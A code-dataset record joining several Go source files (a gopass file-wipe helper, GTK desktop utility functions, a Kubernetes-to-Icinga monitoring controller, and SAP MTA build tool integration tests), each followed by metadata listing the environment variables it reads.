return make([]byte, 1024)
}
}
if _, err := fh.Seek(0, 0); err != nil {
return fmt.Errorf("failed to seek to 0,0: %w", err)
}
var written int64
for {
// end of file
if written >= flen {
break
}
buf := bufFn()
n, err := fh.Write(buf[0:min(flen-written, int64(len(buf)))])
if err != nil {
if err != io.EOF {
return fmt.Errorf("failed to write to file: %w", err)
}
// end of file, should not happen
break
}
written += int64(n)
}
		// if we fail to sync the written blocks to disk it'd be pointless
		// to do any further loops
if err := fh.Sync(); err != nil {
return fmt.Errorf("failed to sync to disk: %w", err)
}
}
if err := fh.Close(); err != nil {
return fmt.Errorf("failed to close file after writing: %w", err)
}
return os.Remove(path)
}
// FileContains searches the given file for the search string and returns true
// iff it's an exact (substring) match.
func FileContains(path, needle string) bool {
fh, err := os.Open(path)
if err != nil {
debug.Log("failed to open %q for reading: %s", path, err)
return false
}
defer fh.Close()
s := bufio.NewScanner(fh)
for s.Scan() {
if strings.Contains(s.Text(), needle) {
return true
}
}
return false
}
func min(a, b int64) int64 {
if a < b {
return a
}
return b
}
|
[
"\"GOPASS_HOMEDIR\""
] |
[] |
[
"GOPASS_HOMEDIR"
] |
[]
|
["GOPASS_HOMEDIR"]
|
go
| 1 | 0 | |
tools.go
|
package main
import (
"fmt"
"math"
"net"
"os"
"os/exec"
"path/filepath"
"strconv"
"strings"
"github.com/gotk3/gotk3/gdk"
"github.com/gotk3/gotk3/glib"
"github.com/gotk3/gotk3/gtk"
)
func check(e error) {
if e != nil {
panic(e)
}
}
func isWayland() bool {
return os.Getenv("XDG_SESSION_TYPE") == "wayland" || os.Getenv("WAYLAND_DISPLAY") != ""
}
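// createPixbuf loads an icon either from an absolute path or by name, falling
// back to the GTK icon theme and finally to the bundled icon-missing placeholder.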
func createPixbuf(icon string, size int) *gdk.Pixbuf {
// full path given
iconPath := ""
if strings.HasPrefix(icon, "/") {
iconPath = icon
pixbuf, err := gdk.PixbufNewFromFileAtSize(iconPath, size, size)
if err != nil {
pixbuf, err = gdk.PixbufNewFromFileAtSize(filepath.Join(dataDir(),
"icons_light/icon-missing.svg"), size, size)
check(err)
}
return pixbuf
}
// gtk icons in use - just name given
if iconsDir == "" {
iconTheme, err := gtk.IconThemeGetDefault()
check(err)
pixbuf, err := iconTheme.LoadIcon(icon, size, gtk.ICON_LOOKUP_FORCE_SIZE)
if err != nil {
pixbuf, err = gdk.PixbufNewFromFileAtSize(filepath.Join(dataDir(),
"icons_light/icon-missing.svg"), size, size)
check(err)
}
return pixbuf
}
// just name given, and we don't use gtk icons
iconPath = filepath.Join(iconsDir, fmt.Sprintf("%s.svg", icon))
pixbuf, err := gdk.PixbufNewFromFileAtSize(iconPath, size, size)
if err != nil {
iconTheme, err := gtk.IconThemeGetDefault()
check(err)
pixbuf, err := iconTheme.LoadIcon(icon, size, gtk.ICON_LOOKUP_FORCE_SIZE)
if err != nil {
pixbuf, err = gdk.PixbufNewFromFileAtSize(filepath.Join(dataDir(),
"icons_light/icon-missing.svg"), size, size)
check(err)
}
return pixbuf
}
return pixbuf
}
func launchCommand(command string) {
elements := strings.Split(command, " ")
cmd := exec.Command(elements[0], elements[1:]...)
go cmd.Run()
if !settings.Preferences.DontClose {
glib.TimeoutAdd(uint(100), func() bool {
gtk.MainQuit()
return false
})
}
}
func keyFound(m map[string]string, key string) bool {
for k := range m {
if k == key {
return true
}
}
return false
}
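// getBattery parses the output of either `upower` or `acpi` and returns a
// human-readable status string together with the charge percentage.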
func getBattery(command string) (string, int) {
msg := ""
perc := 0
if strings.Fields(command)[0] == "upower" {
bat := strings.Split(getCommandOutput(command), "\n")
var state, time, percentage string
for _, line := range bat {
line = strings.TrimSpace(line)
if strings.Contains(line, "time to empty") {
				line = strings.Replace(line, "time to empty", "time_to_empty", 1)
}
parts := strings.Fields(line)
for i, l := range parts {
if strings.Contains(l, "state:") {
state = parts[i+1]
}
if strings.Contains(l, "time_to_empty") {
time = parts[i+1]
}
if strings.Contains(l, "percentage") {
pl := len(parts[i+1])
percentage = parts[i+1][:pl-1]
p, err := strconv.Atoi(percentage)
if err == nil {
perc = p
}
}
}
}
msg = fmt.Sprintf("%d%% %s %s", perc, state, time)
} else if strings.Fields(command)[0] == "acpi" {
bat := strings.Fields(getCommandOutput(command))
msg = strings.Join(bat[2:], " ")
pl := len(bat[3])
percentage := bat[3][:pl-2]
p, err := strconv.Atoi(percentage)
if err == nil {
perc = p
}
}
return msg, perc
}
func getBrightness() float64 {
brightness := 0.0
output := getCommandOutput(settings.Commands.GetBrightness)
bri, e := strconv.ParseFloat(output, 64)
if e == nil {
brightness = math.Round(bri)
}
return brightness
}
func setBrightness(value int) {
cmd := exec.Command("light", "-S", fmt.Sprint(value))
cmd.Run()
}
func listInterfaces() []string {
var list []string
interfaces, err := net.Interfaces()
if err != nil {
return list
}
for _, i := range interfaces {
list = append(list, i.Name)
}
return list
}
func interfaceIsUp(name string) (bool, string) {
netInterface, err := net.InterfaceByName(name)
if err != nil {
fmt.Println(err)
return false, ""
}
addrs, _ := netInterface.Addrs()
if len(addrs) > 1 {
ip := addrs[0].String()
if strings.Contains(ip, "/") {
ip = strings.Split(ip, "/")[0]
}
return true, ip
}
return false, ""
}
|
[
"\"XDG_SESSION_TYPE\"",
"\"WAYLAND_DISPLAY\""
] |
[] |
[
"XDG_SESSION_TYPE",
"WAYLAND_DISPLAY"
] |
[]
|
["XDG_SESSION_TYPE", "WAYLAND_DISPLAY"]
|
go
| 2 | 0 | |
pkg/controller/kubernetes-icinga.go
|
package main
import (
"flag"
"os"
log "github.com/sirupsen/logrus"
"github.com/Nexinto/go-icinga2-client/icinga2"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/tools/clientcmd"
icingaclientset "github.com/Nexinto/kubernetes-icinga/pkg/client/clientset/versioned"
"gopkg.in/yaml.v2"
)
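// main reads its configuration from environment variables (LOG_LEVEL, KUBECONFIG,
// TAG, ICINGA_URL, ICINGA_USER, ICINGA_PASSWORD, ICINGA_DEBUG, DEFAULT_VARS and
// MAPPING), wires up the Kubernetes and Icinga clients and starts the controller.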
func main() {
flag.Parse()
// If this is not set, glog tries to log into something below /tmp which doesn't exist.
flag.Lookup("log_dir").Value.Set("/")
if e := os.Getenv("LOG_LEVEL"); e != "" {
if l, err := log.ParseLevel(e); err == nil {
log.SetLevel(l)
} else {
log.SetLevel(log.WarnLevel)
log.Warnf("unknown log level %s, setting to 'warn'", e)
}
}
var kubeconfig string
if e := os.Getenv("KUBECONFIG"); e != "" {
kubeconfig = e
}
clientConfig, err := clientcmd.BuildConfigFromFlags("", kubeconfig)
if err != nil {
panic(err.Error())
}
kubernetesclient, err := kubernetes.NewForConfig(clientConfig)
if err != nil {
panic(err.Error())
}
icingaclient, err := icingaclientset.NewForConfig(clientConfig)
if err != nil {
panic(err.Error())
}
var tag string
if e := os.Getenv("TAG"); e != "" {
tag = e
} else {
tag = "kubernetes"
}
icingaApi, err := icinga2.New(icinga2.WebClient{
URL: os.Getenv("ICINGA_URL"),
Username: os.Getenv("ICINGA_USER"),
Password: os.Getenv("ICINGA_PASSWORD"),
Debug: os.Getenv("ICINGA_DEBUG") == "true",
InsecureTLS: true})
if err != nil {
panic(err.Error())
}
var defaultVars map[string]string
if e := os.Getenv("DEFAULT_VARS"); e != "" {
err := yaml.Unmarshal([]byte(e), &defaultVars)
if err != nil {
panic("error parsing DEFAULT_VARS: " + err.Error())
}
}
c := &Controller{
Kubernetes: kubernetesclient,
IcingaClient: icingaclient,
Icinga: icingaApi,
Tag: tag,
DefaultVars: defaultVars,
}
switch os.Getenv("MAPPING") {
case "hostgroup":
c.Mapping = &HostGroupMapping{}
case "host":
c.Mapping = &HostMapping{}
default:
c.Mapping = &HostGroupMapping{}
}
c.Initialize()
if err := c.Mapping.MonitorCluster(c); err != nil {
log.Errorf("error setting up monitoring for the cluster: %s", err.Error())
}
go c.RefreshComponentStatutes()
go c.EnsureDefaultHostgroups()
go c.IcingaHousekeeping()
c.Start()
}
|
[
"\"LOG_LEVEL\"",
"\"KUBECONFIG\"",
"\"TAG\"",
"\"ICINGA_URL\"",
"\"ICINGA_USER\"",
"\"ICINGA_PASSWORD\"",
"\"ICINGA_DEBUG\"",
"\"DEFAULT_VARS\"",
"\"MAPPING\""
] |
[] |
[
"LOG_LEVEL",
"ICINGA_URL",
"KUBECONFIG",
"ICINGA_PASSWORD",
"MAPPING",
"TAG",
"DEFAULT_VARS",
"ICINGA_USER",
"ICINGA_DEBUG"
] |
[]
|
["LOG_LEVEL", "ICINGA_URL", "KUBECONFIG", "ICINGA_PASSWORD", "MAPPING", "TAG", "DEFAULT_VARS", "ICINGA_USER", "ICINGA_DEBUG"]
|
go
| 9 | 0 | |
integration/cloud_mta_build_tool_test.go
|
// +build integration
package integration_test
import (
"archive/zip"
"bufio"
"bytes"
"fmt"
"io/ioutil"
"log"
"os"
"os/exec"
"path/filepath"
"runtime"
"strings"
"time"
. "github.com/onsi/ginkgo"
. "github.com/onsi/ginkgo/extensions/table"
. "github.com/onsi/gomega"
"github.com/pkg/errors"
dir "github.com/SAP/cloud-mta-build-tool/internal/archive"
"github.com/SAP/cloud-mta/mta"
)
const (
demoArchiveName = "mta_demo_0.0.1.mtar"
//javaArchiveName = "com.fetcher.project_0.0.1.mtar"
binPath = "mbt"
)
var _ = Describe("Integration - CloudMtaBuildTool", func() {
var mbtName = ""
BeforeSuite(func() {
By("Building MBT")
if runtime.GOOS == "linux" || runtime.GOOS == "darwin" {
mbtName = "mbt"
} else {
mbtName = "mbt.exe"
}
// This runs locally for testing purpose only
/* #nosec */
cmd := exec.Command("go", "build", "-o", filepath.Join(os.Getenv("GOPATH"), "/bin/"+mbtName), ".")
cmd.Dir = filepath.FromSlash("../")
err := cmd.Run()
if err != nil {
fmt.Println("binary creation failed: ", err)
}
})
AfterSuite(func() {
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/" + mbtName))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/Makefile.mta"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/mtad.yaml"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/abc.mtar"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/mta_archives"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_java/myModule/target"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_java/Makefile.mta"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_java/mtad.yaml"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_java/mta_archives"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/node/package-lock.json"))).Should(Succeed())
})
var _ = Describe("Command to provide the list of modules", func() {
It("Getting module", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash(binPath)
cmdOut, cmdErr, err := execute(bin, "provide modules", path)
Ω(err).Should(Succeed(), cmdErr)
Ω(cmdOut).ShouldNot(BeNil())
Ω(cmdOut).Should(ContainSubstring("[node node-js]" + "\n"))
})
It("Command name error", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/")
bin := filepath.FromSlash(binPath)
_, _, err := execute(bin, "provide modules 2", path)
Ω(err).Should(HaveOccurred())
})
})
var _ = Describe("Generate the Makefile according to the mta.yaml file", func() {
It("Generate Makefile for mta_demo", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, "init", path)
Ω(err).Should(Succeed(), errOut)
// Check the MakeFile was generated
Ω(filepath.Join(dir, "testdata", "mta_demo", "Makefile.mta")).Should(BeAnExistingFile())
})
It("Generate Makefile for mta_java", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_java")
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, "init", path)
Ω(err).Should(Succeed(), errOut)
// Check the MakeFile was generated
Ω(filepath.Join(dir, "testdata", "mta_java", "Makefile.mta")).Should(BeAnExistingFile())
})
It("Command name error", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash(binPath)
_, _, err := execute(bin, "init 2", path)
Ω(err).Should(HaveOccurred())
})
})
var _ = Describe("Generate MTAR", func() {
It("Generate MTAR with provided target and mtar name", func() {
dir, _ := os.Getwd()
Ω(os.RemoveAll(filepath.Join(dir, "testdata", "mta_demo", demoArchiveName))).Should(Succeed())
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash("make")
cmdOut, errOut, err := execute(bin, "-f Makefile.mta p=cf mtar=abc t="+path, path)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeEmpty())
// Check the archive was generated
Ω(filepath.Join(dir, "testdata", "mta_demo", "abc.mtar")).Should(BeAnExistingFile())
})
It("Generate MTAR - wrong platform", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash("make")
out, errOut, err := execute(bin, "-f Makefile.mta p=xxx mtar=xyz1", path)
Ω(err).Should(HaveOccurred())
Ω(out + errOut).Should(ContainSubstring(`ERROR invalid target platform "xxx"; supported platforms are: "cf", "neo", "xsa"`))
Ω(filepath.Join(dir, "testdata", "mta_demo", "mta_archives", "xyz1.mtar")).ShouldNot(BeAnExistingFile())
})
var _ = Describe("MBT build - generates Makefile and executes it", func() {
It("MBT build for mta_demo", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, "build -p=cf", path)
Ω(err).Should(Succeed(), errOut)
// Check the MTAR was generated
validateMtaArchiveContents([]string{"node/", "node/data.zip", "node-js/", "node-js/data.zip"}, filepath.Join(path, "mta_archives", "mta_demo_0.0.1.mtar"))
})
It("MBT build - wrong platform", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
bin := filepath.FromSlash(binPath)
_, _, err := execute(bin, "build -p=xxx", path)
Ω(err).Should(HaveOccurred())
})
It("MBT build with timeout", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "moduletimeout")
bin := filepath.FromSlash(binPath)
start := time.Now()
out, errOut, err := execute(bin, "build", path)
elapsed := time.Since(start)
Ω(err).Should(HaveOccurred())
Ω(out + errOut).Should(ContainSubstring("timed out"))
// Check elapsed time
Ω(elapsed).Should(BeNumerically(">=", time.Duration(5)*time.Second))
Ω(elapsed).Should(BeNumerically("<=", time.Duration(10)*time.Second))
})
})
It("Generate MTAR - unsupported platform, module removed from mtad", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash("make")
_, errOut, err := execute(bin, "-f Makefile.mta p=neo mtar=xyz", path)
Ω(err).Should(Succeed(), errOut)
mtarFilename := filepath.Join(dir, "testdata", "mta_demo", "mta_archives", "xyz.mtar")
Ω(mtarFilename).Should(BeAnExistingFile())
// check that module with unsupported platform 'neo' is not presented in mtad.yaml
mtadContent, e := getFileContentFromZip(mtarFilename, "mtad.yaml")
Ω(e).Should(Succeed())
actual, e := mta.Unmarshal(mtadContent)
Ω(e).Should(Succeed())
expected, e := mta.Unmarshal([]byte(`
_schema-version: "3.1"
ID: mta_demo
version: 0.0.1
modules:
- name: node-js
type: nodejs
path: node-js
provides:
- name: node-js_api
properties:
url: ${default-url}
parameters:
name: nodejs
parameters:
hcp-deployer-version: 1.1.0
`))
Ω(e).Should(Succeed())
Ω(actual).Should(Equal(expected))
})
It("Generate MTAR for mta_demo", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash("make")
_, errOut, err := execute(bin, "-f Makefile.mta p=cf", path)
Ω(err).Should(Succeed(), errOut)
// Check the archive was generated
mtarFilename := filepath.Join(dir, "testdata", "mta_demo", "mta_archives", demoArchiveName)
Ω(filepath.Join(dir, "testdata", "mta_demo", "mta_archives", demoArchiveName)).Should(BeAnExistingFile())
// check that module with unsupported platform 'cf' is presented in mtad.yaml
mtadContent, e := getFileContentFromZip(mtarFilename, "mtad.yaml")
Ω(e).Should(Succeed())
actual, e := mta.Unmarshal(mtadContent)
Ω(e).Should(Succeed())
expected, e := mta.Unmarshal([]byte(`
_schema-version: "3.1"
ID: mta_demo
version: 0.0.1
modules:
- name: node
type: javascript.nodejs
path: node
provides:
- name: node_api
properties:
url: ${default-url}
- name: node-js
type: javascript.nodejs
path: node-js
provides:
- name: node-js_api
properties:
url: ${default-url}
`))
Ω(e).Should(Succeed())
Ω(actual).Should(Equal(expected))
validateMtaArchiveContents([]string{"node/", "node/data.zip", "node-js/", "node-js/data.zip"}, filepath.Join(path, "mta_archives", "mta_demo_0.0.1.mtar"))
})
//It("Generate MTAR for mta_java", func() {
//
// dir, _ := os.Getwd()
// path := dir + filepath.FromSlash("/testdata/mta_java")
// bin := filepath.FromSlash("make")
// _, errOut, err, _ := execute(bin, "-f Makefile.mta p=cf", path)
// Ω(err).Should(Succeed(), errOut)
// // Check the archive was generated
// mtarFilename := filepath.Join(dir, "testdata", "mta_java", "mta_archives", javaArchiveName)
// Ω(filepath.Join(dir, "testdata", "mta_java", "mta_archives", javaArchiveName)).Should(BeAnExistingFile())
// // check that module with unsupported platform 'cf' is presented in mtad.yaml
// mtadContent, e := getFileContentFromZip(mtarFilename, "mtad.yaml")
// Ω(e).Should(Succeed())
// actual, e := mta.Unmarshal(mtadContent)
// Ω(e).Should(Succeed())
// expected, e := mta.Unmarshal([]byte(`
// _schema-version: 2.0.0
// ID: com.fetcher.project
// version: 0.0.1
// modules:
// - name: myModule
// type: java.tomcat
// path: myModule
// requires:
// - name: otracker-uaa
// - name: otracker-managed-hdi
// parameters:
// buildpack: sap_java_buildpack
// stack: cflinuxfs3
// resources:
// - name: otracker-uaa
// type: com.sap.xs.uaa-space
// parameters:
// config-path: xs-security.json
// - name: otracker-managed-hdi
// type: com.sap.xs.managed-hdi-container
// `))
// Ω(e).Should(Succeed())
// Ω(actual).Should(Equal(expected))
// validateMtaArchiveContents([]string{"myModule/", "myModule/java-xsahaa-1.1.2.war"}, filepath.Join(path, "mta_archives", "com.fetcher.project_0.0.1.mtar"))
//})
When("Running MBT commands with MTA extension descriptors", func() {
var path string
var mtarFilename string
var makefileName string
BeforeEach(func() {
dir, err := os.Getwd()
Ω(err).Should(Succeed())
path = filepath.Join(dir, "testdata", "mta_demo")
mtarFilename = filepath.Join(path, "mta_archives", demoArchiveName)
makefileName = filepath.Join(path, "Makefile.mta")
})
AfterEach(func() {
Ω(os.RemoveAll(makefileName)).Should(Succeed())
Ω(os.RemoveAll(mtarFilename)).Should(Succeed())
})
var validateMtar = func() {
// Check the MTAR was generated without the node-js module (since the extension file overrides its supported-platforms)
Ω(mtarFilename).Should(BeAnExistingFile())
validateMtaArchiveContents([]string{"node/", "node/data.zip"}, mtarFilename)
// Check the mtad.yaml has the parts from the extension file
// check that module with unsupported platform 'neo' is not present in the mtad.yaml
mtadContent, e := getFileContentFromZip(mtarFilename, "mtad.yaml")
Ω(e).Should(Succeed())
actual, e := mta.Unmarshal(mtadContent)
Ω(e).Should(Succeed())
expected, e := mta.Unmarshal([]byte(`
_schema-version: "3.1"
ID: mta_demo
version: 0.0.1
modules:
- name: node
type: javascript.nodejs
path: node
provides:
- name: node_api
properties:
url: ${default-url}
`))
Ω(e).Should(Succeed())
Ω(actual).Should(Equal(expected))
}
It("MBT build for mta_demo with extension", func() {
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, "build -e=ext.mtaext -p=cf", path)
Ω(err).Should(Succeed(), errOut)
validateMtar()
})
It("MBT init and run make for mta_demo with extension - non-verbose", func() {
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, "init -e=ext.mtaext", path)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeNil())
// Read the MakeFile was generated
Ω(makefileName).Should(BeAnExistingFile())
// generate mtar
_, errOut, err = execute("make", "-f Makefile.mta p=cf", path)
Ω(err).Should(Succeed(), errOut)
validateMtar()
})
It("MBT init and run make for mta_demo with extension - verbose", func() {
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, "init -m=verbose -e=ext.mtaext", path)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeNil())
// Read the MakeFile was generated
Ω(makefileName).Should(BeAnExistingFile())
// generate mtar
_, errOut, err = execute("make", "-f Makefile.mta p=cf", path)
Ω(err).Should(Succeed(), errOut)
validateMtar()
})
})
})
var _ = Describe("Generate the Verbose Makefile and use it for mtar generation", func() {
It("Generate Verbose Makefile", func() {
dir, _ := os.Getwd()
Ω(os.RemoveAll(filepath.Join(dir, "testdata", "mta_demo", "Makefile.mta"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(dir, "testdata", "mta_demo", "mta_archives", demoArchiveName))).Should(Succeed())
path := filepath.Join(dir, "testdata", "mta_demo")
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, "init -m=verbose", path)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeNil())
// Read the MakeFile was generated
Ω(filepath.Join(dir, "testdata", "mta_demo", "Makefile.mta")).Should(BeAnExistingFile())
// generate mtar
bin = filepath.FromSlash("make")
_, errOut, err = execute(bin, "-f Makefile.mta p=cf", path)
Ω(err).Should(Succeed(), errOut)
// Check the archive was generated
Ω(filepath.Join(dir, "testdata", "mta_demo", "mta_archives", demoArchiveName)).Should(BeAnExistingFile())
})
Describe("module with dependencies", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "moduledep")
archivePath := filepath.Join(path, "mta_archives", "f1_0.0.1.mtar")
tempZipPath := filepath.Join(path, "mta_archives", "data.zip")
AfterEach(func() {
Ω(os.RemoveAll(filepath.Join(path, "Makefile.mta"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(path, "mta_archives"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(path, "public", "client"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(path, "public", "client2"))).Should(Succeed())
})
It("Generate Verbose Makefile with module dependencies", func() {
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, "init -m=verbose", path)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeNil())
// Check the MakeFile was generated
Ω(filepath.Join(path, "Makefile.mta")).Should(BeAnExistingFile())
// Generate mtar
bin = filepath.FromSlash("make")
_, errOut, err = execute(bin, "-f Makefile.mta p=cf", path)
Ω(err).Should(Succeed(), errOut)
// Check the archive was generated
Ω(archivePath).Should(BeAnExistingFile())
validateMtaArchiveContents([]string{"module_with_dep/", "module_with_dep/data.zip"}, archivePath)
// Extract data.zip and check its content
err = extractFileFromZip(archivePath, "module_with_dep/data.zip", tempZipPath)
Ω(err).Should(Succeed())
validateArchiveContents([]string{"package.json", "client/", "client/client_package.json", "client2/", "client2/client_package.json"}, tempZipPath)
})
})
})
Describe("module with dependencies", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "moduledep")
archivePath := filepath.Join(path, "mta_archives", "f1_0.0.1.mtar")
tempZipPath := filepath.Join(path, "mta_archives", "data.zip")
AfterEach(func() {
Ω(os.RemoveAll(filepath.Join(path, "mta_archives"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(path, "public", "client"))).Should(Succeed())
Ω(os.RemoveAll(filepath.Join(path, "public", "client2"))).Should(Succeed())
})
DescribeTable("Build MTA with module dependencies", func(additionalBuildOpts []string) {
bin := filepath.FromSlash(binPath)
cmdOut, _, err := executeWithArgs(bin, path, append([]string{"build"}, additionalBuildOpts...)...)
Ω(err).Should(Succeed())
Ω(cmdOut).ShouldNot(BeNil())
// Check the archive was generated
Ω(archivePath).Should(BeAnExistingFile())
validateMtaArchiveContents([]string{"module_with_dep/", "module_with_dep/data.zip"}, archivePath)
// Extract data.zip and check its content
err = extractFileFromZip(archivePath, "module_with_dep/data.zip", tempZipPath)
Ω(err).Should(Succeed())
validateArchiveContents([]string{"package.json", "client/", "client/client_package.json", "client2/", "client2/client_package.json"}, tempZipPath)
},
Entry("Non-verbose build", []string{}),
Entry("Parallel verbose build", []string{"--mode=verbose"}),
Entry("Serial verbose build", []string{"--mode=verbose", "--jobs=1"}),
)
})
var _ = Describe("MBT gen commands", func() {
It("Generate mtad", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
Ω(os.MkdirAll(filepath.Join(path, ".mta_demo_mta_build_tmp", "node"), os.ModePerm)).Should(Succeed())
Ω(os.MkdirAll(filepath.Join(path, ".mta_demo_mta_build_tmp", "node-js"), os.ModePerm)).Should(Succeed())
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, "mtad-gen", path)
Ω(err).Should(Succeed(), errOut)
mtadPath := filepath.Join(path, "mtad.yaml")
Ω(mtadPath).Should(BeAnExistingFile())
content, _ := ioutil.ReadFile(mtadPath)
mtadObj, _ := mta.Unmarshal(content)
Ω(len(mtadObj.Modules)).Should(Equal(2))
Ω(mtadObj.Modules[0].Type).Should(Equal("javascript.nodejs"))
Ω(mtadObj.Modules[1].Type).Should(Equal("javascript.nodejs"))
})
It("Generate mtad with mta extension", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
Ω(os.MkdirAll(filepath.Join(path, ".mta_demo_mta_build_tmp", "node"), os.ModePerm)).Should(Succeed())
Ω(os.MkdirAll(filepath.Join(path, ".mta_demo_mta_build_tmp", "node-js"), os.ModePerm)).Should(Succeed())
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, `mtad-gen -e="ext.mtaext"`, path)
Ω(err).Should(Succeed(), errOut)
mtadPath := filepath.Join(path, "mtad.yaml")
Ω(mtadPath).Should(BeAnExistingFile())
content, _ := ioutil.ReadFile(mtadPath)
mtadObj, _ := mta.Unmarshal(content)
Ω(len(mtadObj.Modules)).Should(Equal(1))
Ω(mtadObj.Modules[0].Name).Should(Equal("node"))
Ω(mtadObj.Modules[0].Type).Should(Equal("javascript.nodejs"))
})
})
var _ = Describe("Deploy basic mta archive", func() {
AfterEach(func() {
resourceCleanup("node")
resourceCleanup("node-js")
})
It("Deploy MTAR", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo/mta_archives")
bin := filepath.FromSlash("cf")
// Execute deployment process with output to make the deployment success/failure more clear
err := executeWithOutput(bin, "deploy "+demoArchiveName+" -f", path)
Ω(err).Should(Succeed())
// Check if the deploy succeeded by using curl command response.
// Receiving the output status code 200 represents successful deployment
args := "-s -o /dev/null -w '%{http_code}' " + os.Getenv("NODE_APP_ROUTE")
path = dir + filepath.FromSlash("/testdata/mta_demo")
bin = filepath.FromSlash("curl")
cmdOut, errOut, err := executeEverySecond(bin, args, path)
if len(errOut) > 0 {
log.Println(errOut)
}
Ω(err).Should(Succeed())
Ω(cmdOut).Should(Equal("'200'"))
})
})
var _ = Describe("Generate merged mta.yaml", func() {
AfterEach(func() {
dir, _ := os.Getwd()
Ω(os.RemoveAll(filepath.Join(dir, "testdata", "mta_demo", "result.yaml"))).Should(Succeed())
})
It("merges with one extension", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, `merge -e=ext.mtaext -n=result.yaml`, path)
Ω(err).Should(Succeed(), errOut)
mtadPath := filepath.Join(path, "result.yaml")
Ω(mtadPath).Should(BeAnExistingFile())
content, _ := ioutil.ReadFile(mtadPath)
mtaObj, _ := mta.Unmarshal(content)
expected, e := mta.Unmarshal([]byte(`
ID: mta_demo
_schema-version: '2.1'
version: 0.0.1
modules:
- name: node
type: nodejs
path: node
provides:
- name: node_api
properties:
url: ${default-url}
build-parameters:
supported-platforms: [cf]
- name: node-js
type: nodejs
path: node-js
provides:
- name: node-js_api
properties:
url: ${default-url}
build-parameters:
builder: zip
supported-platforms: [neo]
`))
Ω(e).Should(Succeed())
Ω(mtaObj).Should(Equal(expected))
})
})
var _ = Describe("Assemble MTAR", func() {
var currentWorkingDirectory string
var mtaAssemblePath string
var resultMtarPath string
BeforeEach(func() {
currentWorkingDirectory, _ = os.Getwd()
mtaAssemblePath = currentWorkingDirectory + filepath.FromSlash("/testdata/mta_assemble")
resultMtarPath = filepath.Join(mtaAssemblePath, "mta_archives", "mta.assembly.example_1.3.3.mtar")
})
AfterEach(func() {
Ω(os.RemoveAll(filepath.Join(mtaAssemblePath, "mta.assembly.example.mtar"))).Should(Succeed())
Ω(os.Chdir(currentWorkingDirectory)).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_assemble/mta_archives"))).Should(Succeed())
})
It("Assemble MTAR", func() {
bin := filepath.FromSlash(binPath)
cmdOut, errOut, err := execute(bin, "assemble", mtaAssemblePath)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeNil())
Ω(cmdOut).Should(ContainSubstring("assembling the MTA project..." + "\n"))
Ω(cmdOut).Should(ContainSubstring("copying the MTA content..." + "\n"))
Ω(cmdOut).Should(ContainSubstring("generating the metadata..." + "\n"))
Ω(cmdOut).Should(ContainSubstring("generating the MTA archive..." + "\n"))
Ω(cmdOut).Should(ContainSubstring("the MTA archive generated at: " + resultMtarPath + "\n"))
